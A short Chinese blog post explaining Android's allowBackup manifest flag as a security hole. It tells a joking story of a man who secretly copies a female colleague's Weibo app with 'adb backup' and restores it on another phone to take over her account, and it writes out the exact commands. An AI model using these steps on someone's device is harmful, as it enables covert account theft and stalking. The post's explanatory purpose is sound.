在androidmanifest.xml文件中
则存在allowbackup漏洞
该漏洞是怎么利用的呢,或者说危害在哪里呢?
借用一下大佬的例子:https://blog.csdn.net/zihao2012/article/details/44220389
某IT男一直暗恋部门某女神,一天女神手机太卡了找IT男帮助清理手机空间,IT男高兴地答应女神两分钟搞定,屁颠屁颠的跑到自己电脑旁边连上手机,女神在一边呆呆的看着IT男敲了几行代码然后在手机上点了几下,最后果然两分钟不到就搞定了,在女神谢着离开后,IT男露出了WS的笑容。
没错,他成功了盗到了女神的微博帐号,终于不用问同事女神的微博帐号是多少了~
那么,他是怎么获得女神的微博账号的呢?
1、连接手机usb,打开手机调试,输入
- adb backup -nosystem -noshared -apk -f com.sina.weibo.ab com.sina.weibo
- 查看手机,选择备份,等待备份完成
2、打开另一部手机
1、adb restore com.sina.weibo.ab
我们就可以用女神的微博了,共同好友,共同话题自己找吧。。